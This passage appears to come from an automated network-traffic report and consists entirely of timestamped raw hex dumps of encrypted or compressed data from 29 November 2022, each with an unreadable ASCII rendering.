c7 eb e6 14 92 c8 1b f6 9c c1 f8 5b 76 da ee 4d 91 f1 bc d3 3c 49 96 dc ca
                                  Data Ascii: b:<Z(f(%q1185H-Fv.Bk<q:M5~0944hsfFfCF-ZDk0Wf!~g G:W8[s/hT2adFDn]y6k_{Tcf[\AX!AxBbtT*0M[vM<I
                                  2022-11-29 15:55:22 UTC36INData Raw: 13 f1 c7 31 27 76 b8 be 2a 5f e1 7c a5 a4 e8 85 94 81 71 a5 57 4e c5 51 50 be 3c 11 09 ea 6b 30 07 62 03 6c 95 36 00 2e 07 c7 69 5f 94 eb 95 37 ca 28 c3 ee 4c ed d5 43 9e da 6d 9c 11 0e b0 93 6b af 19 2b d1 ea c5 a9 66 68 f1 01 3e 21 ec 31 77 05 2e 01 7c ea df ad 43 02 cc 50 6a 33 9a 8f e3 53 fe 30 33 28 87 57 6d dc ae fa 8c 50 f0 6f ac 54 88 42 cf 9e 07 97 5a 72 ce e6 c8 7b 1d 81 61 1c 7d 6b b6 cb c6 05 a7 aa 24 0e 93 76 56 05 14 8b 7d 2a 76 0d a1 1f f0 d5 aa cf 58 d9 26 f1 c3 82 02 f5 be e8 c8 4e a6 b3 57 35 4d 64 5b 63 17 fa d1 66 ec d7 61 18 1d d8 00 ef aa 27 27 8a 7a e7 41 13 7d 21 4f 9d 1a d2 0d ed bf c8 ab a9 2e 13 a4 1d bb bf 28 a2 ab c2 23 87 aa 53 fb e0 f3 a6 71 da 89 e8 b9 4f eb 38 51 1a 05 3e 4c 3a 82 91 cd d0 e5 58 80 c9 95 8d f5 a7 ac a7 35
                                  Data Ascii: 1'v*_|qWNQP<k0bl6.i_7(LCmk+fh>!1w.|CPj3S03(WmPoTBZr{a}k$vV}*vX&NW5Md[cfa''zA}!O.(#SqO8Q>L:X5
                                  2022-11-29 15:55:22 UTC37INData Raw: 8f e5 c0 1b c6 a9 8c 19 85 86 cd 39 74 61 c8 5f c0 d5 6e cf 6f 46 e5 ed 31 95 83 0d 00 e2 47 99 c2 6f 83 d8 1e 70 94 5e 0e 24 e6 a4 78 a1 fe 27 f3 d9 c5 b1 18 59 59 fd a5 be 49 12 c1 85 e9 f5 d9 ad 2e 00 a0 67 f4 0a c6 1b 45 7d 1e 33 bb 26 4b 55 f0 88 d1 ed dd 0f 86 8f 96 f8 44 d8 44 af e3 43 70 74 57 78 5a 5a 30 5c a9 57 4c e8 2b 90 18 7b 7c 34 81 f3 f5 06 c4 26 0e 90 0b d4 cf 82 9f 88 07 45 cf 69 8a 83 98 a8 01 8e b1 3c 4b 86 2a ee 67 3b 46 16 78 41 39 42 11 01 ff 35 7a 64 b0 e5 8a 79 2a fe 2e 68 27 07 1e 4f b9 c1 d0 5e c9 21 e7 91 72 f7 72 57 34 31 e8 84 1a d7 d2 c6 b8 81 00 0c 4f cf c4 5a e9 c5 3d 23 c1 bd 04 fc 65 9c 94 8d c6 fb 01 5b b6 51 99 b9 de 40 1d 33 15 6a fa bd 99 35 e7 bd 18 b3 a6 5c 23 86 42 f1 20 9b 95 a5 e7 9d d5 7b 71 d9 09 b3 ea 3a e2
                                  Data Ascii: 9ta_noF1Gop^$x'YYI.gE}3&KUDDCptWxZZ0\WL+{|4&Ei<K*g;FxA9B5zdy*.h'O^!rrW41OZ=#e[Q@3j5\#B {q:
                                  2022-11-29 15:55:22 UTC39INData Raw: 1f 2b 6b ac 4c f3 13 ec bd f9 5b 05 24 f3 0a 07 cf 97 c8 6a 19 1c d7 36 6d 42 bc a6 98 e4 fb 12 ca bc dd 61 b2 83 98 da aa 22 d1 88 72 3c 6c a9 7f 78 fd a9 7a ce 10 b0 93 35 06 0e 98 6f 0d f9 76 2d 4a 63 80 56 34 70 01 62 a6 c3 94 91 42 c0 91 64 12 36 a0 89 16 2c cf b1 59 d2 bf 8f 2d ec 56 1e 6b e4 23 0b 37 2e d8 4c cb fd 7f 3e 53 37 1e f9 cb c3 46 39 21 89 19 e1 73 ec 57 f7 cd 32 70 9b 28 8c cf f5 0a 35 84 61 57 da 98 5d 47 ab 45 6a 40 56 b5 30 da 4b 6b 98 f5 ce e7 f9 4b b0 47 dc ec 1b 95 66 39 b8 ff 9f 8c 60 cb ab ef bb 19 34 bc 54 8c 5c 22 14 78 8b c5 3b 7b 3f 5f ca 8e 79 ed 18 32 26 86 fd 54 90 a0 1e e2 d5 f4 ca 24 34 4e 69 78 c4 e0 f4 8d 9e 14 28 9d 6c 7b dc 66 6c 23 43 c5 8b 17 1f e6 1d f6 70 02 da a4 db 35 5b 54 41 7e 37 8f b0 5e b7 07 81 0d 3e 25
                                  Data Ascii: +kL[$j6mBa"r<lxz5ov-JcV4pbBd6,Y-Vk#7.L>S7F9!sW2p(5aW]GEj@V0KkKGf9`4T\"x;{?_y2&T$4Nix(l{fl#Cp5[TA~7^>%
                                  2022-11-29 15:55:22 UTC40INData Raw: 18 7c d7 67 f9 78 70 2c 08 b3 f2 ff 51 c7 20 e2 f0 5f 7c 4a d1 f0 23 a3 16 18 01 12 cf c1 1c 60 5d 5f 96 bb 09 73 b1 30 e9 49 79 36 d6 52 1f b7 2b 8d c4 60 d2 4a 91 39 de 35 cc ee 9c 9d c1 75 0c ae bc bc 23 bd cb 80 98 32 3d ba 2f 23 a5 7e e4 ae 59 cf 9c bc 40 42 1e 88 6d c6 3b 6f 5c bd 0c 51 d0 b1 71 76 41 de 9b 05 69 dd cc db 8f 22 ad 1f 58 c7 95 f9 35 d6 26 b2 60 9f 94 56 74 2e ca 44 f5 3c 9f 1f 81 c6 40 49 26 6e ee f5 63 e7 ee 29 56 22 9a 3d ef 0c 1c 3e 85 8d 3c ca c9 a1 d8 45 67 4f 29 b4 19 a4 f9 9f ca 44 08 7e 20 c4 cb 49 b7 17 9b 96 0a c6 aa a2 2b 3a 76 e3 e4 3b 43 f2 fc 4d 13 c7 4d b1 42 09 a4 1f cc f4 de 18 f5 22 fb 8e db 99 17 28 ef 43 e4 f7 7e 57 32 b0 b2 18 ce 8e b2 7e 5e 94 f7 7e bb 8d db 25 4d f1 43 7f 99 cd e6 5a 93 82 1e 1c 34 29 b6 77 cb
                                  Data Ascii: |gxp,Q _|J#`]_s0Iy6R+`J95u#2=/#~Y@Bm;o\QqvAi"X5&`Vt.D<@I&nc)V"=><EgO)D~ I+:v;CMMB"(C~W2~^~%MCZ4)w
                                  2022-11-29 15:55:22 UTC41INData Raw: 25 b9 33 0a a6 65 27 49 8d fa 9c 5a 3d 49 d7 49 08 e9 98 9f 02 c4 61 68 5e b0 a9 8e 51 50 c6 42 10 73 7b bc 05 bb c6 b1 d4 8f 46 e7 24 3b aa f9 d4 da 99 79 d2 42 68 a0 2f cd 6b 6f 09 92 08 28 76 3c d6 f4 da a4 38 a2 d8 24 92 60 c2 99 fa be fe a3 44 06 a4 1e 9c 30 52 44 fc 48 37 90 8f 20 c0 bb 09 59 1a 5c 6a 54 63 51 00 e7 7c 01 cf b5 7a 3e 60 67 7c 25 c3 45 de 28 f0 10 cd a0 43 6d e5 8e 8c 27 01 8a ee e0 84 cf d3 aa e7 cf e4 6d eb b3 b0 1b 0a 2c b2 b8 b0 5f d7 8d 1f 80 48 da c9 41 d0 cd c8 c9 0b c6 3f 5d 92 bd b8 9e 4c c5 aa a2 2b d5 fa 32 ea 5a 62 bd 38 5b 11 e9 da c1 45 1c 60 42 b4 42 4f 07 7b 6e 92 2a a3 47 7c 4a 84 91 ba 7a 05 f2 a0 82 2d 89 e1 95 f8 5c 34 4d ac 48 47 05 b9 b3 bb b3 1d 7b d2 8c 5a 4e 0b 80 8a c3 7a 09 d5 fb b0 ce eb e5 61 c6 94 7e 0e
                                  Data Ascii: %3e'IZ=IIah^QPBs{F$;yBh/ko(v<8$`D0RDH7 Y\jTcQ|z>`g|%E(Cm'm,_HA?]L+2Zb8[E`BBO{n*G|Jz-\4MHG{ZNza~
                                  2022-11-29 15:55:22 UTC43INData Raw: 22 93 4f c4 6b 1c 0b 08 1c 45 de 3a 3e e4 28 b9 fb ce 83 ea e2 b5 43 ba 6b 0c 13 5b 2f 82 c6 38 76 34 67 b2 0e 0b 9c 17 fa f9 04 2e 28 28 f8 50 28 ec 40 a1 5d 32 3a 1a 4c 47 c8 45 c0 fb 79 2f bb 3b 61 92 05 78 02 f7 35 ab 96 7c fd d8 51 9f 24 27 ba df 95 89 b0 b3 63 ba 70 fc 5d d7 3b 67 96 bb 05 cc 1a f8 e7 8c b2 a5 0f 76 bd 54 8a 4a 03 5c 62 09 50 a8 0a 59 03 d3 6f 06 f8 d0 b5 86 ab b6 ae 22 1a 66 36 f1 a3 c8 ab 4b e4 cf 94 96 0c f4 ce dc b7 44 2e 69 6a 8c b2 17 37 fe 95 3b e9 c5 09 b4 ff 86 87 e4 b9 aa b1 89 87 df d8 c7 a3 4e 56 51 53 7d 7e 27 87 c5 74 b3 fa 80 7e 1a d3 81 80 e5 f2 73 8f 3d 4b df e1 7c c9 79 ce 9c a3 ca 8e 91 13 cb 82 ee 71 17 87 ef 7f 76 61 43 26 0a bd 89 c9 0f 94 95 c1 a0 fb 43 b3 2f 68 ca 18 92 c5 08 cb c1 e4 52 a1 ce 9f 01 b9 65 e7
                                  Data Ascii: "OkE:>(Ck[/8v4g.((P(@]2:LGEy/;ax5|Q$'cp];gvTJ\bPYo"f6KD.ij7;NVQS}~'t~s=K|yqvaC&C/hRe
                                  2022-11-29 15:55:22 UTC44INData Raw: 9e 20 d9 0a 03 b0 6d 69 16 c3 62 b6 91 06 7d bf a2 c0 b2 dd cf cb 56 38 8c a8 d0 6d 37 3e 67 e4 14 a2 5c 45 69 84 2c 44 87 37 20 98 b0 2c 4a 02 08 91 5a db 66 67 a9 73 ff 9a c9 04 42 4f c3 43 ed d1 51 60 30 0e bc 9a 7b a3 24 dd d5 d8 29 93 95 91 5e b3 19 d7 00 35 21 d4 1f e5 45 24 af e7 43 3f 89 f3 ee 16 2c 95 fe d5 ae ba 9d 34 e8 ce f5 14 e9 42 b1 75 f3 0b 44 7d f5 06 c3 1e 45 d0 ab 11 83 cd b0 58 6c 6c b5 96 81 55 01 61 c6 a5 d9 e3 97 5e e8 71 a1 51 fa eb 13 8a 29 19 10 0f fc fa 33 86 2c 5c e2 57 52 75 77 00 54 ed 4e fd d1 06 c2 44 66 03 b7 98 fb 18 f7 10 11 c0 ee 4d b6 bc ca 80 b6 01 a1 00 a3 e7 5c 33 b9 3b 0e c0 b4 80 f5 cf 0a 50 c1 c2 ff 34 9a 31 89 37 87 09 d0 7c 77 a2 18 af 92 f6 6f c5 85 1d 26 88 da 48 ee b5 ed 73 94 ae 0b 6a 3c 68 87 95 36 9b ef
                                  Data Ascii: mib}V8m7>g\Ei,D7 ,JZfgsBOCQ`0{$)^5!E$C?,4BuD}EXllUa^qQ)3,\WRuwTNDfM\3;P417|wo&Hsj<h6
                                  2022-11-29 15:55:22 UTC45INData Raw: 40 5d 80 1c 95 7f 22 a4 3f 39 4d 6f 74 a3 b1 a4 8c b9 d0 5c f4 9f 7d 5a 59 82 96 f1 9b 95 5a 44 90 38 51 9a 7e 87 7b 30 fd 5e c2 77 3e e5 8d d7 32 ab b9 8b a9 d8 5e ee 84 4f e0 b0 58 a5 b2 92 49 91 70 11 87 0b 4e ea 87 22 e8 1a 7d 75 25 ce 91 87 2e b2 70 bd 81 d5 fd 84 63 81 86 e5 65 92 75 68 3a 2b f3 03 40 0c 17 81 12 f6 4e bb 74 97 93 0f e0 85 d7 46 90 f8 7c 03 c8 91 6b a1 b9 a4 be f4 ad cd b3 42 49 e1 11 89 5b 1c a1 68 a2 fc bb f7 87 79 1c d1 ed 6a 08 90 0d 47 9a 3c 40 5c 3f 53 c8 04 c5 17 98 65 36 87 87 32 9c 20 4b 0b 69 ad 7b c1 4a 0e b3 91 a0 3e 8d 45 3f 63 57 77 a5 e9 9a bd da a6 fc 33 43 1b 11 27 11 f1 38 fb 4a ac b5 a5 80 c5 ca cb eb a4 4d 89 e4 09 50 ec ad bc 5c dd fe 7c 23 ef 4d d7 7e 18 eb 14 a1 f5 4d 89 09 53 e8 fe 8b 2f 07 af be 86 40 5e f4
                                  Data Ascii: @]"?9Mot\}ZYZD8Q~{0^w>2^OXIpN"}u%.pceuh:+@NtF|kBI[hyjG<@\?Se62 Ki{J>E?cWw3C'8JMP\|#M~MS/@^
                                  2022-11-29 15:55:22 UTC47INData Raw: db ae b4 7b a1 bc 16 58 d9 55 ae dd a1 cd 7f 0a a4 7b 5a 9b 03 42 06 c4 b4 e8 a4 79 50 c8 9e 86 bc c5 f3 01 1c 4e 9f e6 6c dd 6a 7e 7d ba 88 86 96 c1 a7 08 22 3f 90 73 3f 4a 15 69 d4 1e a2 55 c5 0b 6c 1e 0b cc 52 56 1e cb 40 c7 95 f4 a5 fe 46 68 a7 81 2f 9a 03 69 e6 6d 9a 24 18 f7 89 80 b4 f4 f6 b2 59 0f f1 9f e4 6a 19 2f 03 f1 4e 94 6f 52 27 5a 1a 7c cc 2d 5b 21 dc 97 d2 6e 93 89 e5 41 8e d6 96 d8 a7 5b c1 be 94 0e 0f 91 3d 1e 0a b7 33 5e b6 ee 34 7b 00 8a 9c 65 6d 7a 9b 55 8c 25 8d a4 47 5b e6 64 68 f9 81 b4 9a 97 5f 10 77 d9 e6 f8 50 ca 3c 20 b2 f1 d5 f5 45 3d 59 09 1d 2b e1 98 bd aa 82 6a 97 23 19 33 d8 ec b8 36 e3 f0 2e 84 dd 68 08 51 fd 38 52 4b 6f aa 53 10 5e d5 b1 46 8f 86 22 a5 50 3a 82 40 49 93 23 fe fc 38 99 e9 0c d5 a0 19 df 02 24 9d 31 88 41
                                  Data Ascii: {XU{ZByPNlj~}"?s?JiUlRV@Fh/im$Yj/NoR'Z|-[!nA[=3^4{emzU%G[dh_wP< E=Y+j#36.hQ8RKoS^F"P:@I#8$1A
                                  2022-11-29 15:55:22 UTC48INData Raw: 3b 13 b0 ee 2f 18 30 06 f9 1d 0e e2 48 ab 0c 6d 40 40 02 64 93 c0 b1 3c 01 1d c8 e7 23 c3 c8 56 80 6d 98 05 b6 3c fb d1 fc c2 77 57 af 68 ba 79 9c 30 a1 f0 e4 d1 08 7a 4d c5 e1 f8 95 9b 09 f6 12 46 fb cd b0 7e 44 d7 ce e2 ca ce b1 51 11 86 c6 13 16 3d 0c 47 c1 3f 82 56 7a 7d a9 87 de 01 1e c2 34 4f 64 9a 4a 1a b4 12 63 bd 67 c8 b7 e8 ec cb 3e ff 12 5a 4f e8 1f e5 60 fe c7 3d fe 87 9e ec d1 cd 34 65 4d 25 25 cb b5 76 a4 04 8b a8 81 c8 1d 31 83 70 e9 23 d6 14 14 48 e0 b6 e7 77 60 5e e6 f9 05 e5 06 f0 d3 3a 86 4c 71 87 28 06 ed 48 ac 68 80 bf d0 0a 47 64 18 59 ff 6c 11 44 ec 4c be 8a 5e c6 d2 9d 10 b1 20 a4 86 6d 46 85 58 2f aa 4b 17 5f e6 3d 69 88 db f3 fc 5a 81 a5 31 c4 18 19 56 f5 7d 99 0c 57 77 e7 42 e7 22 02 f9 f7 df 6e ff b7 69 06 b6 86 b7 92 0c 0b 09
                                  Data Ascii: ;/0Hm@@d<#Vm<wWhy0zMF~DQ=G?Vz}4OdJcg>ZO`=4eM%%v1p#Hw`^:Lq(HhGdYlDL^ mFX/K_=iZ1V}WwB"ni
                                  2022-11-29 15:55:22 UTC49INData Raw: b1 76 e8 a6 2b e0 ac d2 34 45 69 3b 0b 9b 31 d1 b9 67 35 36 e1 e7 c7 db 52 b5 12 40 43 38 07 db a4 99 1b bb e2 79 5b dc fe 47 f4 b1 7a 97 a5 0c d1 62 0f f2 1c af d7 9a d0 66 8c 1e 59 97 77 50 7e e1 a6 b0 3f 82 ae e0 d9 1b f4 94 19 7d 0d 09 35 9b 57 8e 03 85 e4 9f 26 e3 89 ed 7e 76 7b 8d c2 4d c2 f1 a6 3d 1b 4a d8 29 0c c5 2c f0 77 fa bb 47 8f e1 fe 36 6d d3 17 88 27 89 82 8f 4e f2 f9 b2 bb 03 87 ed 62 2c 31 c8 91 49 a4 81 c7 cf 63 67 e8 98 f5 e9 ea a5 a4 58 37 ff 22 d7 54 7f ab 2a 06 74 7e 56 64 7e 49 fa 6d 0a f3 fb 01 80 0f 6f 71 a4 a7 d2 96 fe 2c 34 0a 41 a4 1d a2 ab 0e ab 7d 54 9e 5f 70 3c 28 3a 70 a7 89 c9 ee b3 85 c3 19 0d 67 03 0b 8e 19 1d b2 92 11 ec b6 d4 7a 81 80 43 dc 42 6e e5 91 dc e5 f3 ef 95 bb 6c 6c c5 6e 99 a4 3f 38 41 c3 f7 4f 41 b6 15 28
                                  Data Ascii: v+4Ei;1g56R@C8y[GzbfYwP~?}5W&~v{M=J),wG6m'Nb,1IcgX7"T*t~Vd~Imoq,4A}T_p<(:pgzCBnlln?8AOA(
                                  2022-11-29 15:55:22 UTC51INData Raw: 4f ba 30 3a eb 00 aa 12 4b dd df 20 c2 c5 b6 e4 93 f9 0a 70 ab 5c 11 57 2e ab d8 0b 25 64 8c 29 3a 14 23 a0 ce cb ce 6f bd 7c 2e 52 c1 93 c0 ff 19 07 9e d4 95 83 aa 41 ed 9f 66 52 66 04 f6 03 93 60 67 ba e5 7f 42 8c f2 63 63 18 8f 3d a3 9d a5 93 7f c0 58 eb e4 dc 52 1e 63 8f d6 f9 4f 77 7f d1 ac b7 5d c3 6e 10 ed b3 30 96 35 99 91 cc 06 18 2c aa eb ce fc a3 ba 71 6e e5 69 77 60 34 56 1c c5 ee af 37 f9 57 94 f9 9b 95 7b 0b 7b 44 31 68 63 e5 80 b5 66 f2 82 60 74 dd 01 4b 1a a9 6f 4b 18 27 b8 8c e2 ee a2 b5 a9 43 d8 8a 7c 05 39 01 b5 61 30 2d 76 e8 f8 6c ee 25 1d 03 46 f7 ba 89 87 9d d6 4d ce 37 08 05 a5 26 aa f2 64 db 48 ed d8 f8 b9 9b 7f f6 56 33 c1 31 e1 fa a8 db 9c 8b b5 64 9f 7b 85 a0 f2 ca cf fa b8 4e 98 33 97 22 9e 9c 8f 6f ee f7 26 e9 e3 fa 11 fb 3d
                                  Data Ascii: O0:K p\W.%d):#o|.RAfRf`gBcc=XRcOw]n05,qniw`4V7W{{D1hcf`tKoK'C|9a0-vl%FM7&dHV31d{N3"o&=
                                  2022-11-29 15:55:22 UTC52INData Raw: 95 94 50 84 fb f8 29 1d e8 1e c7 d7 08 f6 3f 26 25 b4 e7 29 24 01 2d 90 8d 84 1b 78 be c5 09 9f f9 bc bd a7 d1 44 72 01 09 b7 f2 be a6 63 f5 08 87 91 58 f0 6a 84 b6 fe b7 1b 51 83 ce 76 50 92 32 dd f3 57 1a 24 e4 fb d9 f1 cf 88 93 9d f4 e8 14 a1 52 4f 8a 7e d4 69 90 b5 c2 d2 f1 7e a2 2f 0c ce 8a 09 86 89 86 1d 0a 91 bb 2a d8 5e 84 11 aa 57 0f db 61 9e b6 3d 42 ff 34 49 51 69 ee fd 73 8d be b6 56 f3 e3 fe 4f a5 0a 4e 24 15 b3 2d 0a 8b 6f d6 1a 7b be 77 a8 4a 9b 07 5d 48 4b b9 09 46 c6 5b 39 d6 28 b3 80 00 eb 41 70 60 44 58 ba 72 23 1f d9 97 95 ea 34 95 8b 47 06 fc 8a 4d e2 77 cb d7 04 61 18 e5 20 77 17 bf 8f 12 9d 49 a7 dd 99 8d ba 4f 50 14 ee cd af 6f 15 df 6c b8 3a 71 09 69 04 06 9e cf 67 25 8f 23 03 ca 07 0c de 5d 45 4b 05 9e 1f bf fa 36 2b 23 f2 49 dc
                                  Data Ascii: P)?&%)$-xDrcXjQvP2W$RO~i~/*^Wa=B4IQisVON$-o{wJ]HKF[9(Ap`DXr#4GMwa wIOPol:qig%#]EK6+#I
                                  2022-11-29 15:55:22 UTC53INData Raw: 24 f6 04 01 0b 2a 5a 95 25 b8 94 31 4e 31 01 75 9c 13 2a c0 17 18 b7 52 9d cc 90 db 2a 6e c6 be d1 66 ee f3 34 a7 f0 a7 99 28 93 33 62 fe 38 a7 45 60 fa 2c 23 cc 7a b7 ee 98 25 8b 2b b6 b8 87 39 7a aa 4a b0 3c c6 a8 71 4d 0b 3d bd 9a e7 05 33 cc 8a 02 a6 8c ab c5 5e 4d 89 48 8d 57 00 86 cd e7 15 09 e9 41 59 be 0e 83 8a ef 25 f6 79 27 dc 8a 6b 04 47 8f aa 0b 60 27 cc de 35 79 a7 3f b9 f4 85 22 09 48 b3 43 2d 35 60 a5 2d 51 8f 89 78 09 15 dc 2a 35 8b f9 6b 9c a6 36 e6 95 3f 03 fd 5b 7f 1b e8 b6 1d 80 52 8f bf 7c 4d f5 8e 07 31 be 82 c7 c9 b8 73 fc 48 2b 87 1b 10 e2 93 05 ec 64 05 58 d2 45 2b ec 89 77 16 55 a8 0d 2c f5 db 9d d8 ed 65 7c aa d1 42 2a a3 79 68 f0 da 8a c1 3f 06 fe c5 c6 16 4b 15 ce b8 31 da 0e d6 e5 c2 2c 84 7e 0a 93 81 87 5d b8 38 f2 57 79 80
                                  Data Ascii: $*Z%1N1u*R*nf4(3b8E`,#z%+9zJ<qM=3^MHWAY%y'kG`'5y?"HC-5`-Qx*5k6?[R|M1sH+dXE+wU,e|B*yh?K1,~]8Wy
                                  2022-11-29 15:55:22 UTC55INData Raw: 53 0c 57 be dd 92 7a b5 1c cf 58 1a db 80 61 f2 0a 53 df 5c 57 5f 93 f8 a2 74 90 d4 27 ae e6 97 38 67 e7 3d b2 a0 1d c1 b7 53 d6 ed a3 7c c3 f0 a5 95 5a 6e 7b 7c c6 c7 74 82 1b cc c5 7a 3e 2e 99 a8 b4 c9 24 a5 de 39 4a eb 41 3f 73 6a ce 85 e5 f4 ce 2a 44 e7 e7 f9 bd a8 3e e8 24 f4 15 1e cd ab 0a ec 4d e2 98 0e ef 31 77 a2 f9 ac b9 ac e8 97 83 18 63 7d 1f 3d 70 4c 30 3b b7 e4 08 03 72 c6 fe cd 5c ff 6d ba a2 c2 12 ec dc 7f da 7f b3 59 f4 f6 04 49 b0 0a a7 2b 4b 6d 3e 34 a1 d6 51 f1 5e 6b 16 c2 17 3f 3b e3 52 03 77 56 ba 35 6a a5 8c 55 9f ab 3b 25 77 0c 77 5c 25 fd d7 d6 42 8f b1 3d cb 92 2a b9 ba 82 94 66 6d 17 2e 0f ee c6 2b aa 75 24 6e 31 9b d0 75 ff 46 6d b6 b3 57 a7 2d 21 97 89 2b 6b da b2 f4 59 59 06 e9 2d 61 24 7c 49 af 96 11 46 df f8 d0 77 b3 87 3e
                                  Data Ascii: SWzXaS\W_t'8g=S|Zn{|tz>.$9JA?sj*D>$M1wc}=pL0;r\mYI+Km>4Q^k?;RwV5jU;%ww\%B=*fm.+u$n1uFmW-!+kYY-a$|IFw>
                                  2022-11-29 15:55:22 UTC59INData Raw: 8e 7f d9 d6 cf 8c bf 2e 39 72 27 d1 3d e6 21 65 07 99 e7 41 72 64 0e cf ea 87 ce 69 74 29 e2 c8 5e 1b 35 b3 d8 b5 27 a7 d1 18 b1 3b 0f f6 26 b9 52 0f 99 1a e8 40 21 23 cf 6e 3c 5d 40 97 f5 9c 89 0c 73 24 1f 33 b9 19 2a 1a b4 c6 9e 74 e8 59 a2 62 45 09 b4 94 5f f8 b0 56 01 53 21 c4 11 53 41 be 93 6f 92 7d 07 5a 1c 5c a9 f8 06 5e 43 a4 f4 68 00 2f 11 44 da 91 11 a0 c4 dd ad 5e 5e 82 29 bb df 2b ef b0 89 b6 76 19 7f 80 4f 2a 8c ff 6c 23 63 51 ab b9 e2 92 fa 10 2e 88 0b 66 3d c3 98 d1 57 54 95 94 ec ce fa b6 3d 95 81 6c 94 0b 42 b4 1e 4c 10 da 3f 36 87 a8 87 c9 b8 dd 96 0f bc d0 59 49 37 12 4a 91 ae a0 6b ca d1 a0 ed 01 11 ae 12 d3 f8 ae f3 c7 55 66 f5 bf c9 83 1e 5e 29 65 3a a7 a4 3b e0 1c d0 31 31 84 a1 63 a5 af 0b 2e 50 a0 ed ee 3e 71 18 9d c8 ef f0 ba be
                                  Data Ascii: .9r'=!eArdit)^5';&R@!#n<]@s$3*tYbE_VS!SAo}Z\^Ch/D^^)+vO*l#cQ.f=WT=lBL?6YI7JkUf^)e:;11c.P>q
                                  2022-11-29 15:55:22 UTC63INData Raw: 99 80 1e 02 02 48 d8 9f 26 75 05 ec ec a5 2a f1 43 43 82 ae 3c 82 37 19 94 a9 2e fa 48 e5 5a 21 42 b4 b7 57 58 02 4e 08 d7 a5 b8 3e 71 a8 22 85 48 0a 99 25 d3 16 12 1c 46 ff 5f ea 95 d2 6d 15 14 e2 65 2c b2 60 1b c5 95 1c 1c 87 25 7a 6b 56 7e fb 0a 00 27 0a ab 84 e7 b4 fa b6 fe dd 66 4b 46 59 58 c5 50 94 50 82 77 90 5e 4d 0b a5 e6 96 7a 7e 76 97 b2 05 c3 fa f9 4b 06 7f 52 1e 85 a3 74 fc 1c 52 7b 86 11 89 d6 ea 24 c6 1a 14 7c df 09 f2 d9 9d 01 bb 04 02 99 3a b7 d3 b2 c8 92 de 1c c8 77 8f 59 51 12 4a 11 08 f8 9b 64 ea c5 8c 0b cd 9c fc 16 0a 83 b8 af f3 98 23 d9 fc a7 7a 31 71 94 19 22 8b 13 bc 41 26 d6 b7 2d 13 d4 6e 46 bf 2b b5 65 1d 85 ef 09 24 c7 2c d0 1a a9 8f 9f 6a 5b 7b 97 fd 26 fd 09 9d 48 02 2a 95 c0 95 80 46 77 b4 d9 62 15 dc 8c a5 5a 3e cd 62 7c
                                  Data Ascii: H&u*CC<7.HZ!BWXN>q"H%F_me,`%zkV~'fKFYXPPw^Mz~vKRtR{$|:wYQJd#z1q"A&-nF+e$,j[{&H*FwbZ>b|
                                  2022-11-29 15:55:22 UTC65INData Raw: cc 6d 51 26 2f 66 34 e1 fb d4 a7 95 c9 84 21 19 78 f1 29 4b 1b eb a2 20 62 12 d6 0e 43 cd 2c 97 9a b7 66 f8 e5 fa e7 51 67 0f 91 30 08 03 a1 2f 3b 46 22 3d 07 b0 2f bb b7 6e 70 5b 6f 37 97 07 bd 5b c1 5d 29 55 6a 16 cb 8f 2d 10 02 d6 e6 51 7b 85 0c 71 06 5b 46 2d 27 40 25 17 ff 6d f9 b4 c1 f9 22 be 4b 70 9d 04 87 07 06 1a 9c fc 3d de 79 da c4 0b 16 2c ea 00 df 08 84 04 ab fa b2 2c b8 97 ac b2 f1 c7 47 8d 08 43 37 2a 5d 06 ab dd b3 86 01 cc 4f 1c 26 82 01 a4 e3 99 76 86 22 fc 8e ec 5d eb 74 ca 31 8a 38 6d b1 b6 41 50 72 96 8b 76 32 0a f2 36 db 6e 8d 83 19 62 ca f9 94 68 39 96 38 d3 0b fc 09 9a fe b0 1a 7d 0c 88 13 e2 e4 78 77 a6 e5 f5 62 58 84 ec 05 3e a1 41 ec 1e 61 e1 40 9e 09 d2 47 6c d4 99 24 52 db cc ae 0a a6 82 86 d3 a9 84 6a 3b 46 98 ba cc c6 f5 67
                                  Data Ascii: mQ&/f4!x)K bC,fQg0/;F"=/np[o7[])Uj-Q{q[F-'@%m"Kp=y,,GC7*]O&v"]t18mAPrv26nbh98}xwbX>Aa@Gl$Rj;Fg
                                  2022-11-29 15:55:22 UTC69INData Raw: 85 70 8b ae 70 de 38 b7 b5 10 f0 b6 5c f4 e1 85 59 68 92 fa 5e 1e 19 4b 17 55 3a a7 48 a2 07 c9 4d 79 1f 5f 12 20 ef 45 42 86 0e ac e3 38 0c 30 55 c9 07 c1 3f ef 43 9e eb 01 69 fd dd 87 b6 b7 15 f1 36 19 2d fd ff 3d 18 20 ad 8f 71 03 94 38 b7 a8 2e ba cf f1 a2 34 53 e7 3c 68 71 aa 0b 2e 08 78 9a 17 cc f4 51 ed cb 8e c1 9c 58 23 d3 a4 dc d8 9d 8a 08 cb 68 7e 46 8d 59 77 d8 ed e7 ed a2 14 3c 27 00 70 52 2f 57 42 06 1b 95 c8 4a d0 2d aa 80 a4 68 46 ce 27 d4 ab a6 a9 34 92 be b5 a3 5f 95 23 3e 90 51 0d 1e 0d 02 fa e4 be 09 a7 df 58 8b da ae 3d 26 b7 6e 1a c8 93 c9 5b b7 22 90 dc c1 b6 aa c8 f4 3a 2d b1 f9 cf 86 cb 86 6a 72 4e f9 bb 40 1d aa 36 be 11 35 0f fa 9d 12 3b f6 77 1a ba 8e 9c 8a 44 7f 1b 3b 09 36 da 05 9b d2 4f 13 27 e4 be b6 0d c3 db 70 3c 87 0d a9
                                  Data Ascii: pp8\Yh^KU:HMy_ EB80U?Ci6-= q8.4S<hq.xQX#h~FYw<'pR/WBJ-hF'4_#>QX=&n[":-jrN@65;wD;6O'p<
                                  2022-11-29 15:55:22 UTC74INData Raw: 49 b0 9c 37 3d 82 c4 31 04 96 ed 5c 1e 05 87 e3 54 fc fe 19 1f bb e2 8e 8e 58 8e 59 d2 8d a9 51 29 87 9c c2 a2 cb 20 64 d9 ed 98 2f e7 b2 9f 9a 5c 4c 67 34 77 f2 d1 21 8b 82 ec 8f 3f 8d 85 67 e1 ae 5b b7 af a3 6d a4 cd 72 d2 7d 9d 17 33 ec db 55 c1 9c 7b 67 77 d7 ad 53 ae 92 19 37 14 89 87 bd 3c 8c 24 a7 1a ff c5 45 64 b7 6b a6 ef e4 53 ae 58 dc a8 f7 1b ba df 78 dc f8 58 a3 58 94 24 32 69 41 e6 be 85 46 ca ce d6 50 f8 43 2a b2 22 fa 43 d5 54 55 84 9e 56 d0 a4 fe f3 83 14 32 3c 1a 36 e0 61 c3 97 38 fa a5 27 e7 18 8a ee 28 5d 22 e3 a6 1a b7 be 03 5a 4e 2d d5 2a d4 9c 87 93 94 76 05 84 21 67 8d 96 